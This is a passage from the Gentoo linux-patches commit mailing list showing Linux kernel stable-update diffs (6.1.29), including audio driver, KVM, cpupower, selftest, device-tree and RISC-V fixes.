++		goto err_pm_disable;
+ 	}
+ 
+ 	fsl_micfil_dai.capture.formats = micfil->soc->formats;
+@@ -722,9 +722,20 @@ static int fsl_micfil_probe(struct platform_device *pdev)
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to register component %s\n",
+ 			fsl_micfil_component.name);
++		goto err_pm_disable;
+ 	}
+ 
+ 	return ret;
++
++err_pm_disable:
++	pm_runtime_disable(&pdev->dev);
++
++	return ret;
++}
++
++static void fsl_micfil_remove(struct platform_device *pdev)
++{
++	pm_runtime_disable(&pdev->dev);
+ }
+ 
+ static int __maybe_unused fsl_micfil_runtime_suspend(struct device *dev)
+@@ -785,6 +796,7 @@ static const struct dev_pm_ops fsl_micfil_pm_ops = {
+ 
+ static struct platform_driver fsl_micfil_driver = {
+ 	.probe = fsl_micfil_probe,
++	.remove_new = fsl_micfil_remove,
+ 	.driver = {
+ 		.name = "fsl-micfil-dai",
+ 		.pm = &fsl_micfil_pm_ops,
+diff --git a/sound/soc/mediatek/mt8186/mt8186-afe-clk.c b/sound/soc/mediatek/mt8186/mt8186-afe-clk.c
+index a6b4f29049bbc..539e3a023bc4e 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-afe-clk.c
++++ b/sound/soc/mediatek/mt8186/mt8186-afe-clk.c
+@@ -644,9 +644,3 @@ int mt8186_init_clock(struct mtk_base_afe *afe)
+ 
+ 	return 0;
+ }
+-
+-void mt8186_deinit_clock(void *priv)
+-{
+-	struct mtk_base_afe *afe = priv;
+-	mt8186_audsys_clk_unregister(afe);
+-}
+diff --git a/sound/soc/mediatek/mt8186/mt8186-afe-clk.h b/sound/soc/mediatek/mt8186/mt8186-afe-clk.h
+index d5988717d8f2d..a9d59e506d9af 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-afe-clk.h
++++ b/sound/soc/mediatek/mt8186/mt8186-afe-clk.h
+@@ -81,7 +81,6 @@ enum {
+ struct mtk_base_afe;
+ int mt8186_set_audio_int_bus_parent(struct mtk_base_afe *afe, int clk_id);
+ int mt8186_init_clock(struct mtk_base_afe *afe);
+-void mt8186_deinit_clock(void *priv);
+ int mt8186_afe_enable_cgs(struct mtk_base_afe *afe);
+ void mt8186_afe_disable_cgs(struct mtk_base_afe *afe);
+ int mt8186_afe_enable_clock(struct mtk_base_afe *afe);
+diff --git a/sound/soc/mediatek/mt8186/mt8186-afe-pcm.c b/sound/soc/mediatek/mt8186/mt8186-afe-pcm.c
+index d7e94e6a19c70..0e3792ccd49f6 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-afe-pcm.c
++++ b/sound/soc/mediatek/mt8186/mt8186-afe-pcm.c
+@@ -2847,10 +2847,6 @@ static int mt8186_afe_pcm_dev_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = devm_add_action_or_reset(dev, mt8186_deinit_clock, (void *)afe);
+-	if (ret)
+-		return ret;
+-
+ 	/* init memif */
+ 	afe->memif_32bit_supported = 0;
+ 	afe->memif_size = MT8186_MEMIF_NUM;
+diff --git a/sound/soc/mediatek/mt8186/mt8186-audsys-clk.c b/sound/soc/mediatek/mt8186/mt8186-audsys-clk.c
+index 578969ca91c8e..5666be6b1bd2e 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-audsys-clk.c
++++ b/sound/soc/mediatek/mt8186/mt8186-audsys-clk.c
+@@ -84,6 +84,29 @@ static const struct afe_gate aud_clks[CLK_AUD_NR_CLK] = {
+ 	GATE_AUD2(CLK_AUD_ETDM_OUT1_BCLK, "aud_etdm_out1_bclk", "top_audio", 24),
+ };
+ 
++static void mt8186_audsys_clk_unregister(void *data)
++{
++	struct mtk_base_afe *afe = data;
++	struct mt8186_afe_private *afe_priv = afe->platform_priv;
++	struct clk *clk;
++	struct clk_lookup *cl;
++	int i;
++
++	if (!afe_priv)
++		return;
++
++	for (i = 0; i < CLK_AUD_NR_CLK; i++) {
++		cl = afe_priv->lookup[i];
++		if (!cl)
++			continue;
++
++		clk = cl->clk;
++		clk_unregister_gate(clk);
++
++		clkdev_drop(cl);
++	}
++}
++
+ int mt8186_audsys_clk_register(struct mtk_base_afe *afe)
+ {
+ 	struct mt8186_afe_private *afe_priv = afe->platform_priv;
+@@ -124,27 +147,6 @@ int mt8186_audsys_clk_register(struct mtk_base_afe *afe)
+ 		afe_priv->lookup[i] = cl;
+ 	}
+ 
+-	return 0;
++	return devm_add_action_or_reset(afe->dev, mt8186_audsys_clk_unregister, afe);
+ }
+ 
+-void mt8186_audsys_clk_unregister(struct mtk_base_afe *afe)
+-{
+-	struct mt8186_afe_private *afe_priv = afe->platform_priv;
+-	struct clk *clk;
+-	struct clk_lookup *cl;
+-	int i;
+-
+-	if (!afe_priv)
+-		return;
+-
+-	for (i = 0; i < CLK_AUD_NR_CLK; i++) {
+-		cl = afe_priv->lookup[i];
+-		if (!cl)
+-			continue;
+-
+-		clk = cl->clk;
+-		clk_unregister_gate(clk);
+-
+-		clkdev_drop(cl);
+-	}
+-}
+diff --git a/sound/soc/mediatek/mt8186/mt8186-audsys-clk.h b/sound/soc/mediatek/mt8186/mt8186-audsys-clk.h
+index b8d6a06e11e8d..897a2914dc191 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-audsys-clk.h
++++ b/sound/soc/mediatek/mt8186/mt8186-audsys-clk.h
+@@ -10,6 +10,5 @@
+ #define _MT8186_AUDSYS_CLK_H_
+ 
+ int mt8186_audsys_clk_register(struct mtk_base_afe *afe);
+-void mt8186_audsys_clk_unregister(struct mtk_base_afe *afe);
+ 
+ #endif
+diff --git a/sound/soc/sof/topology.c b/sound/soc/sof/topology.c
+index 6a0e7f3b50234..872e44408298f 100644
+--- a/sound/soc/sof/topology.c
++++ b/sound/soc/sof/topology.c
+@@ -545,6 +545,10 @@ static int sof_copy_tuples(struct snd_sof_dev *sdev, struct snd_soc_tplg_vendor_
+ 				if (*num_copied_tuples == tuples_size)
+ 					return 0;
+ 			}
++
++			/* stop when we've found the required token instances */
++			if (found == num_tokens * token_instance_num)
++				return 0;
+ 		}
+ 
+ 		/* next array */
+diff --git a/sound/usb/format.c b/sound/usb/format.c
+index 4b1c5ba121f39..ab5fed9f55b60 100644
+--- a/sound/usb/format.c
++++ b/sound/usb/format.c
+@@ -423,6 +423,7 @@ static int line6_parse_audio_format_rates_quirk(struct snd_usb_audio *chip,
+ 	case USB_ID(0x0e41, 0x4248): /* Line6 Helix >= fw 2.82 */
+ 	case USB_ID(0x0e41, 0x4249): /* Line6 Helix Rack >= fw 2.82 */
+ 	case USB_ID(0x0e41, 0x424a): /* Line6 Helix LT >= fw 2.82 */
++	case USB_ID(0x0e41, 0x424b): /* Line6 Pod Go */
+ 	case USB_ID(0x19f7, 0x0011): /* Rode Rodecaster Pro */
+ 		return set_fixed_rate(fp, 48000, SNDRV_PCM_RATE_48000);
+ 	}
+diff --git a/tools/include/uapi/asm-generic/fcntl.h b/tools/include/uapi/asm-generic/fcntl.h
+index b02c8e0f40575..1c7a0f6632c09 100644
+--- a/tools/include/uapi/asm-generic/fcntl.h
++++ b/tools/include/uapi/asm-generic/fcntl.h
+@@ -91,7 +91,6 @@
+ 
+ /* a horrid kludge trying to make sure that this will fail on old kernels */
+ #define O_TMPFILE (__O_TMPFILE | O_DIRECTORY)
+-#define O_TMPFILE_MASK (__O_TMPFILE | O_DIRECTORY | O_CREAT)      
+ 
+ #ifndef O_NDELAY
+ #define O_NDELAY	O_NONBLOCK
+diff --git a/tools/power/cpupower/utils/idle_monitor/mperf_monitor.c b/tools/power/cpupower/utils/idle_monitor/mperf_monitor.c
+index e7d48cb563c0e..ae6af354a81db 100644
+--- a/tools/power/cpupower/utils/idle_monitor/mperf_monitor.c
++++ b/tools/power/cpupower/utils/idle_monitor/mperf_monitor.c
+@@ -70,8 +70,8 @@ static int max_freq_mode;
+  */
+ static unsigned long max_frequency;
+ 
+-static unsigned long long tsc_at_measure_start;
+-static unsigned long long tsc_at_measure_end;
++static unsigned long long *tsc_at_measure_start;
++static unsigned long long *tsc_at_measure_end;
+ static unsigned long long *mperf_previous_count;
+ static unsigned long long *aperf_previous_count;
+ static unsigned long long *mperf_current_count;
+@@ -169,7 +169,7 @@ static int mperf_get_count_percent(unsigned int id, double *percent,
+ 	aperf_diff = aperf_current_count[cpu] - aperf_previous_count[cpu];
+ 
+ 	if (max_freq_mode == MAX_FREQ_TSC_REF) {
+-		tsc_diff = tsc_at_measure_end - tsc_at_measure_start;
++		tsc_diff = tsc_at_measure_end[cpu] - tsc_at_measure_start[cpu];
+ 		*percent = 100.0 * mperf_diff / tsc_diff;
+ 		dprint("%s: TSC Ref - mperf_diff: %llu, tsc_diff: %llu\n",
+ 		       mperf_cstates[id].name, mperf_diff, tsc_diff);
+@@ -206,7 +206,7 @@ static int mperf_get_count_freq(unsigned int id, unsigned long long *count,
+ 
+ 	if (max_freq_mode == MAX_FREQ_TSC_REF) {
+ 		/* Calculate max_freq from TSC count */
+-		tsc_diff = tsc_at_measure_end - tsc_at_measure_start;
++		tsc_diff = tsc_at_measure_end[cpu] - tsc_at_measure_start[cpu];
+ 		time_diff = timespec_diff_us(time_start, time_end);
+ 		max_frequency = tsc_diff / time_diff;
+ 	}
+@@ -225,33 +225,27 @@ static int mperf_get_count_freq(unsigned int id, unsigned long long *count,
+ static int mperf_start(void)
+ {
+ 	int cpu;
+-	unsigned long long dbg;
+ 
+ 	clock_gettime(CLOCK_REALTIME, &time_start);
+-	mperf_get_tsc(&tsc_at_measure_start);
+ 
+-	for (cpu = 0; cpu < cpu_count; cpu++)
++	for (cpu = 0; cpu < cpu_count; cpu++) {
++		mperf_get_tsc(&tsc_at_measure_start[cpu]);
+ 		mperf_init_stats(cpu);
++	}
+ 
+-	mperf_get_tsc(&dbg);
+-	dprint("TSC diff: %llu\n", dbg - tsc_at_measure_start);
+ 	return 0;
+ }
+ 
+ static int mperf_stop(void)
+ {
+-	unsigned long long dbg;
+ 	int cpu;
+ 
+-	for (cpu = 0; cpu < cpu_count; cpu++)
++	for (cpu = 0; cpu < cpu_count; cpu++) {
+ 		mperf_measure_stats(cpu);
++		mperf_get_tsc(&tsc_at_measure_end[cpu]);
++	}
+ 
+-	mperf_get_tsc(&tsc_at_measure_end);
+ 	clock_gettime(CLOCK_REALTIME, &time_end);
+-
+-	mperf_get_tsc(&dbg);
+-	dprint("TSC diff: %llu\n", dbg - tsc_at_measure_end);
+-
+ 	return 0;
+ }
+ 
+@@ -353,7 +347,8 @@ struct cpuidle_monitor *mperf_register(void)
+ 	aperf_previous_count = calloc(cpu_count, sizeof(unsigned long long));
+ 	mperf_current_count = calloc(cpu_count, sizeof(unsigned long long));
+ 	aperf_current_count = calloc(cpu_count, sizeof(unsigned long long));
+-
++	tsc_at_measure_start = calloc(cpu_count, sizeof(unsigned long long));
++	tsc_at_measure_end = calloc(cpu_count, sizeof(unsigned long long));
+ 	mperf_monitor.name_len = strlen(mperf_monitor.name);
+ 	return &mperf_monitor;
+ }
+@@ -364,6 +359,8 @@ void mperf_unregister(void)
+ 	free(aperf_previous_count);
+ 	free(mperf_current_count);
+ 	free(aperf_current_count);
++	free(tsc_at_measure_start);
++	free(tsc_at_measure_end);
+ 	free(is_valid);
+ }
+ 
+diff --git a/tools/testing/selftests/cgroup/test_memcontrol.c b/tools/testing/selftests/cgroup/test_memcontrol.c
+index 8833359556f38..fe4f9f4302822 100644
+--- a/tools/testing/selftests/cgroup/test_memcontrol.c
++++ b/tools/testing/selftests/cgroup/test_memcontrol.c
+@@ -98,6 +98,11 @@ static int alloc_anon_50M_check(const char *cgroup, void *arg)
+ 	int ret = -1;
+ 
+ 	buf = malloc(size);
++	if (buf == NULL) {
++		fprintf(stderr, "malloc() failed\n");
++		return -1;
++	}
++
+ 	for (ptr = buf; ptr < buf + size; ptr += PAGE_SIZE)
+ 		*ptr = 0;
+ 
+@@ -211,6 +216,11 @@ static int alloc_anon_noexit(const char *cgroup, void *arg)
+ 	char *buf, *ptr;
+ 
+ 	buf = malloc(size);
++	if (buf == NULL) {
++		fprintf(stderr, "malloc() failed\n");
++		return -1;
++	}
++
+ 	for (ptr = buf; ptr < buf + size; ptr += PAGE_SIZE)
+ 		*ptr = 0;
+ 
+@@ -759,6 +769,11 @@ static int alloc_anon_50M_check_swap(const char *cgroup, void *arg)
+ 	int ret = -1;
+ 
+ 	buf = malloc(size);
++	if (buf == NULL) {
++		fprintf(stderr, "malloc() failed\n");
++		return -1;
++	}
++
+ 	for (ptr = buf; ptr < buf + size; ptr += PAGE_SIZE)
+ 		*ptr = 0;
+ 
+diff --git a/tools/testing/selftests/net/fib_nexthops.sh b/tools/testing/selftests/net/fib_nexthops.sh
+index a47b26ab48f23..0f5e88c8f4ffe 100755
+--- a/tools/testing/selftests/net/fib_nexthops.sh
++++ b/tools/testing/selftests/net/fib_nexthops.sh
+@@ -2283,7 +2283,7 @@ EOF
+ ################################################################################
+ # main
+ 
+-while getopts :t:pP46hv:w: o
++while getopts :t:pP46hvw: o
+ do
+ 	case $o in
+ 		t) TESTS=$OPTARG;;
+diff --git a/tools/testing/selftests/net/srv6_end_dt4_l3vpn_test.sh b/tools/testing/selftests/net/srv6_end_dt4_l3vpn_test.sh
+index 1003119773e5d..f962823628119 100755
+--- a/tools/testing/selftests/net/srv6_end_dt4_l3vpn_test.sh
++++ b/tools/testing/selftests/net/srv6_end_dt4_l3vpn_test.sh
+@@ -232,10 +232,14 @@ setup_rt_networking()
+ 	local nsname=rt-${rt}
+ 
+ 	ip netns add ${nsname}
++
++	ip netns exec ${nsname} sysctl -wq net.ipv6.conf.all.accept_dad=0
++	ip netns exec ${nsname} sysctl -wq net.ipv6.conf.default.accept_dad=0
++
+ 	ip link set veth-rt-${rt} netns ${nsname}
+ 	ip -netns ${nsname} link set veth-rt-${rt} name veth0
+ 
+-	ip -netns ${nsname} addr add ${IPv6_RT_NETWORK}::${rt}/64 dev veth0
++	ip -netns ${nsname} addr add ${IPv6_RT_NETWORK}::${rt}/64 dev veth0 nodad
+ 	ip -netns ${nsname} link set veth0 up
+ 	ip -netns ${nsname} link set lo up
+ 
+@@ -254,6 +258,12 @@ setup_hs()
+ 
+ 	# set the networking for the host
+ 	ip netns add ${hsname}
++
++	# disable the rp_filter otherwise the kernel gets confused about how
++	# to route decap ipv4 packets.
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.default.rp_filter=0
++
+ 	ip -netns ${hsname} link add veth0 type veth peer name ${rtveth}
+ 	ip -netns ${hsname} link set ${rtveth} netns ${rtname}
+ 	ip -netns ${hsname} addr add ${IPv4_HS_NETWORK}.${hs}/24 dev veth0
+@@ -272,11 +282,6 @@ setup_hs()
+ 
+ 	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.proxy_arp=1
+ 
+-	# disable the rp_filter otherwise the kernel gets confused about how
+-	# to route decap ipv4 packets.
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.rp_filter=0
+-
+ 	ip netns exec ${rtname} sh -c "echo 1 > /proc/sys/net/vrf/strict_mode"
+ }
+ 
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 3a3c1bc3e303f..de8e5eb6af106 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -3947,18 +3947,19 @@ static int kvm_vm_ioctl_create_vcpu(struct kvm *kvm, u32 id)
+ 	}
+ 
+ 	vcpu->vcpu_idx = atomic_read(&kvm->online_vcpus);
+-	r = xa_insert(&kvm->vcpu_array, vcpu->vcpu_idx, vcpu, GFP_KERNEL_ACCOUNT);
+-	BUG_ON(r == -EBUSY);
++	r = xa_reserve(&kvm->vcpu_array, vcpu->vcpu_idx, GFP_KERNEL_ACCOUNT);
+ 	if (r)
+ 		goto unlock_vcpu_destroy;
+ 
+ 	/* Now it's all set up, let userspace reach it */
+ 	kvm_get_kvm(kvm);
+ 	r = create_vcpu_fd(vcpu);
+-	if (r < 0) {
+-		xa_erase(&kvm->vcpu_array, vcpu->vcpu_idx);
+-		kvm_put_kvm_no_destroy(kvm);
+-		goto unlock_vcpu_destroy;
++	if (r < 0)
++		goto kvm_put_xa_release;
++
++	if (KVM_BUG_ON(!!xa_store(&kvm->vcpu_array, vcpu->vcpu_idx, vcpu, 0), kvm)) {
++		r = -EINVAL;
++		goto kvm_put_xa_release;
+ 	}
+ 
+ 	/*
+@@ -3973,6 +3974,9 @@ static int kvm_vm_ioctl_create_vcpu(struct kvm *kvm, u32 id)
+ 	kvm_create_vcpu_debugfs(vcpu);
+ 	return r;
+ 
++kvm_put_xa_release:
++	kvm_put_kvm_no_destroy(kvm);
++	xa_release(&kvm->vcpu_array, vcpu->vcpu_idx);
+ unlock_vcpu_destroy:
+ 	mutex_unlock(&kvm->lock);
+ 	kvm_dirty_ring_free(&vcpu->dirty_ring);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-17 10:57 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-17 10:57 UTC (permalink / raw
  To: gentoo-commits

commit:     800648f486b3c55fff4995e849dad07d684858ac
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 17 10:57:20 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 17 10:57:20 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=800648f4

Linux patch 6.1.29

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1028_linux-6.1.29.patch | 16121 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 16125 insertions(+)

diff --git a/0000_README b/0000_README
index dd54d67d..9c3afe15 100644
--- a/0000_README
+++ b/0000_README
@@ -155,6 +155,10 @@ Patch:  1027_linux-6.1.28.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.28
 
+Patch:  1028_linux-6.1.29.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.29
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1028_linux-6.1.29.patch b/1028_linux-6.1.29.patch
new file mode 100644
index 00000000..06c8b0c4
--- /dev/null
+++ b/1028_linux-6.1.29.patch
@@ -0,0 +1,16121 @@
+diff --git a/Makefile b/Makefile
+index 2d221b879c48f..f02f6e1ac5743 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 28
++SUBLEVEL = 29
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts b/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
+index 9b4cf5ebe6d5f..c62aff908ab48 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
+@@ -63,7 +63,7 @@
+ 		status = "okay";
+ 		m25p,fast-read;
+ 		label = "bmc";
+-		spi-max-frequency = <100000000>; /* 100 MHz */
++		spi-max-frequency = <50000000>; /* 50 MHz */
+ #include "openbmc-flash-layout.dtsi"
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts b/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
+index ff4c07c69af1c..4554abf0c7cdf 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
+@@ -31,7 +31,7 @@
+ 		};
+ 
+ 		system-fault {
+-			gpios = <&gpio ASPEED_GPIO(Z, 2) GPIO_ACTIVE_LOW>;
++			gpios = <&gpio ASPEED_GPIO(Z, 2) GPIO_ACTIVE_HIGH>;
+ 			panic-indicator;
+ 		};
+ 	};
+@@ -51,7 +51,7 @@
+ 		status = "okay";
+ 		m25p,fast-read;
+ 		label = "bmc";
+-		spi-max-frequency = <100000000>; /* 100 MHz */
++		spi-max-frequency = <50000000>; /* 50 MHz */
+ #include "openbmc-flash-layout-64.dtsi"
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/exynos4412-itop-elite.dts b/arch/arm/boot/dts/exynos4412-itop-elite.dts
+index 202ab0fee3b70..bfc79490e2e22 100644
+--- a/arch/arm/boot/dts/exynos4412-itop-elite.dts
++++ b/arch/arm/boot/dts/exynos4412-itop-elite.dts
+@@ -182,7 +182,7 @@
+ 		compatible = "wlf,wm8960";
+ 		reg = <0x1a>;
+ 		clocks = <&pmu_system_controller 0>;
+-		clock-names = "MCLK1";
++		clock-names = "mclk";
+ 		wlf,shared-lrclk;
+ 		#sound-dai-cells = <0>;
+ 	};
+diff --git a/arch/arm/boot/dts/s5pv210.dtsi b/arch/arm/boot/dts/s5pv210.dtsi
+index 12e90a1cc6a14..1a9e4a96b2ff7 100644
+--- a/arch/arm/boot/dts/s5pv210.dtsi
++++ b/arch/arm/boot/dts/s5pv210.dtsi
+@@ -566,7 +566,7 @@
+ 				interrupts = <29>;
+ 				clocks = <&clocks CLK_CSIS>,
+ 						<&clocks SCLK_CSIS>;
+-				clock-names = "clk_csis",
++				clock-names = "csis",
+ 						"sclk_csis";
+ 				bus-width = <4>;
+ 				status = "disabled";
+diff --git a/arch/riscv/errata/sifive/errata.c b/arch/riscv/errata/sifive/errata.c
+index 1031038423e74..c24a349dd026d 100644
+--- a/arch/riscv/errata/sifive/errata.c
++++ b/arch/riscv/errata/sifive/errata.c
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <linux/kernel.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/string.h>
+ #include <linux/bug.h>
+@@ -107,7 +108,9 @@ void __init_or_module sifive_errata_patch_func(struct alt_entry *begin,
+ 
+ 		tmp = (1U << alt->errata_id);
+ 		if (cpu_req_errata & tmp) {
++			mutex_lock(&text_mutex);
+ 			patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++			mutex_unlock(&text_mutex);
+ 			cpu_apply_errata |= tmp;
+ 		}
+ 	}
+diff --git a/arch/riscv/errata/thead/errata.c b/arch/riscv/errata/thead/errata.c
+index 21546937db39b..32a34ed735098 100644
+--- a/arch/riscv/errata/thead/errata.c
++++ b/arch/riscv/errata/thead/errata.c
+@@ -5,6 +5,7 @@
+ 
+ #include <linux/bug.h>
+ #include <linux/kernel.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/string.h>
+ #include <linux/uaccess.h>
+@@ -78,11 +79,14 @@ void __init_or_module thead_errata_patch_func(struct alt_entry *begin, struct al
+ 		tmp = (1U << alt->errata_id);
+ 		if (cpu_req_errata & tmp) {
+ 			/* On vm-alternatives, the mmu isn't running yet */
+-			if (stage == RISCV_ALTERNATIVES_EARLY_BOOT)
++			if (stage == RISCV_ALTERNATIVES_EARLY_BOOT) {
+ 				memcpy((void *)__pa_symbol(alt->old_ptr),
+ 				       (void *)__pa_symbol(alt->alt_ptr), alt->alt_len);
+-			else
++			} else {
++				mutex_lock(&text_mutex);
+ 				patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++				mutex_unlock(&text_mutex);
++			}
+ 		}
+ 	}
+ 
+diff --git a/arch/riscv/kernel/Makefile b/arch/riscv/kernel/Makefile
+index db6e4b1294ba3..ab333cb792fd9 100644
+--- a/arch/riscv/kernel/Makefile
++++ b/arch/riscv/kernel/Makefile
+@@ -9,6 +9,7 @@ CFLAGS_REMOVE_patch.o	= $(CC_FLAGS_FTRACE)
+ CFLAGS_REMOVE_sbi.o	= $(CC_FLAGS_FTRACE)
+ endif
+ CFLAGS_syscall_table.o	+= $(call cc-option,-Wno-override-init,)
++CFLAGS_compat_syscall_table.o += $(call cc-option,-Wno-override-init,)
+ 
+ ifdef CONFIG_KEXEC
+ AFLAGS_kexec_relocate.o := -mcmodel=medany $(call cc-option,-mno-relax)
+diff --git a/arch/riscv/kernel/cpufeature.c b/arch/riscv/kernel/cpufeature.c
+index 694267d1fe814..fd1238df61497 100644
+--- a/arch/riscv/kernel/cpufeature.c
++++ b/arch/riscv/kernel/cpufeature.c
+@@ -9,6 +9,7 @@
+ #include <linux/bitmap.h>
+ #include <linux/ctype.h>
+ #include <linux/libfdt.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+ #include <asm/alternative.h>
+@@ -316,8 +317,11 @@ void __init_or_module riscv_cpufeature_patch_func(struct alt_entry *begin,
+ 		}
+ 
+ 		tmp = (1U << alt->errata_id);
+-		if (cpu_req_feature & tmp)
++		if (cpu_req_feature & tmp) {
++			mutex_lock(&text_mutex);
+ 			patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++			mutex_unlock(&text_mutex);
++		}
+ 	}
+ }
+ #endif
+diff --git a/arch/riscv/mm/pageattr.c b/arch/riscv/mm/pageattr.c
+index 86c56616e5dea..ea3d61de065b3 100644
+--- a/arch/riscv/mm/pageattr.c
++++ b/arch/riscv/mm/pageattr.c
+@@ -217,18 +217,26 @@ bool kernel_page_present(struct page *page)
+ 	pgd = pgd_offset_k(addr);
+ 	if (!pgd_present(*pgd))
+ 		return false;
++	if (pgd_leaf(*pgd))
++		return true;
+ 
+ 	p4d = p4d_offset(pgd, addr);
+ 	if (!p4d_present(*p4d))
+ 		return false;
++	if (p4d_leaf(*p4d))
++		return true;
+ 
+ 	pud = pud_offset(p4d, addr);
+ 	if (!pud_present(*pud))
+ 		return false;
++	if (pud_leaf(*pud))
++		return true;
+ 
+ 	pmd = pmd_offset(pud, addr);
+ 	if (!pmd_present(*pmd))
+ 		return false;
++	if (pmd_leaf(*pmd))
++		return true;
+ 
+ 	pte = pte_offset_kernel(pmd, addr);
+ 	return pte_present(*pte);
+diff --git a/arch/s390/kernel/uv.c b/arch/s390/kernel/uv.c
+index f9810d2a267c6..5caa0ed2b594a 100644
+--- a/arch/s390/kernel/uv.c
++++ b/arch/s390/kernel/uv.c
+@@ -192,21 +192,10 @@ static int expected_page_refs(struct page *page)
+ 	return res;
+ }
+ 
+-static int make_secure_pte(pte_t *ptep, unsigned long addr,
+-			   struct page *exp_page, struct uv_cb_header *uvcb)
++static int make_page_secure(struct page *page, struct uv_cb_header *uvcb)
+ {
+-	pte_t entry = READ_ONCE(*ptep);
+-	struct page *page;
+ 	int expected, cc = 0;
+ 
+-	if (!pte_present(entry))
+-		return -ENXIO;
+-	if (pte_val(entry) & _PAGE_INVALID)
+-		return -ENXIO;
+-
+-	page = pte_page(entry);
+-	if (page != exp_page)
+-		return -ENXIO;
+ 	if (PageWriteback(page))
+ 		return -EAGAIN;
+ 	expected = expected_page_refs(page);
+@@ -297,17 +286,18 @@ again:
+ 		goto out;
+ 
+ 	rc = -ENXIO;
+-	page = follow_page(vma, uaddr, FOLL_WRITE);
+-	if (IS_ERR_OR_NULL(page))
+-		goto out;
+-
+-	lock_page(page);
+ 	ptep = get_locked_pte(gmap->mm, uaddr, &ptelock);
+-	if (should_export_before_import(uvcb, gmap->mm))
+-		uv_convert_from_secure(page_to_phys(page));
+-	rc = make_secure_pte(ptep, uaddr, page, uvcb);
++	if (pte_present(*ptep) && !(pte_val(*ptep) & _PAGE_INVALID) && pte_write(*ptep)) {
++		page = pte_page(*ptep);
++		rc = -EAGAIN;
++		if (trylock_page(page)) {
++			if (should_export_before_import(uvcb, gmap->mm))
++				uv_convert_from_secure(page_to_phys(page));
++			rc = make_page_secure(page, uvcb);
++			unlock_page(page);
++		}
++	}
+ 	pte_unmap_unlock(ptep, ptelock);
+-	unlock_page(page);
+ out:
+ 	mmap_read_unlock(gmap->mm);
+ 
+diff --git a/arch/sh/Kconfig.debug b/arch/sh/Kconfig.debug
+index 10290e5c1f438..c449e7c1b20ff 100644
+--- a/arch/sh/Kconfig.debug
++++ b/arch/sh/Kconfig.debug
+@@ -15,7 +15,7 @@ config SH_STANDARD_BIOS
+ 
+ config STACK_DEBUG
+ 	bool "Check for stack overflows"
+-	depends on DEBUG_KERNEL
++	depends on DEBUG_KERNEL && PRINTK
+ 	help
+ 	  This option will cause messages to be printed if free stack space
+ 	  drops below a certain limit. Saying Y here will add overhead to
+diff --git a/arch/sh/kernel/head_32.S b/arch/sh/kernel/head_32.S
+index 4adbd4ade3194..b603b7968b388 100644
+--- a/arch/sh/kernel/head_32.S
++++ b/arch/sh/kernel/head_32.S
+@@ -64,7 +64,7 @@ ENTRY(_stext)
+ 	ldc	r0, r6_bank
+ #endif
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ 	mov	r4, r12		! Store device tree blob pointer in r12
+ #endif
+ 	
+@@ -315,7 +315,7 @@ ENTRY(_stext)
+ 10:		
+ #endif
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ 	mov.l	8f, r0		! Make flat device tree available early.
+ 	jsr	@r0
+ 	 mov	r12, r4
+@@ -346,7 +346,7 @@ ENTRY(stack_start)
+ 5:	.long	start_kernel
+ 6:	.long	cpu_init
+ 7:	.long	init_thread_union
+-#if defined(CONFIG_OF_FLATTREE)
++#if defined(CONFIG_OF_EARLY_FLATTREE)
